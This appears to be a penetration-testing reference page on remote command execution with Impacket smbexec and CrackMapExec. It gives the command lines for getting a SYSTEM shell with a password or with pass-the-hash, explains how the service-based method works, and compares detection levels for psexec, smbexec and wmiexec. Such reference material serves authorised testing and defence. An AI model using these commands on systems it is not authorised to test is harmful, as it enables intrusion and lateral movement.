Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Impacket — smbexec

impacket-smbexec DOMAIN/user:password@TARGET
impacket-smbexec DOMAIN/user@TARGET -hashes :NTLM_HASH
Returns SYSTEM shell. Uses service creation for execution.

How It Works

  1. Creates a service on target via SMB
  2. Service executes command, output redirected to file
  3. Reads output via SMB
  4. Deletes service
No binary upload — commands run through cmd.exe /Q /c.

CrackMapExec

crackmapexec smb TARGET -u user -p password --exec-method smbexec -x "whoami"

Comparison

Featurepsexecsmbexecwmiexec
PrivilegeSYSTEMSYSTEMUser
Binary uploadYesNoNo
ProtocolSMBSMBWMI
DetectionHighMediumLower

Quick Reference

TaskCommand
Shellimpacket-smbexec DOMAIN/user:pass@TARGET
PtHimpacket-smbexec DOMAIN/user@TARGET -hashes :HASH
CMEcrackmapexec smb TARGET --exec-method smbexec -x "cmd"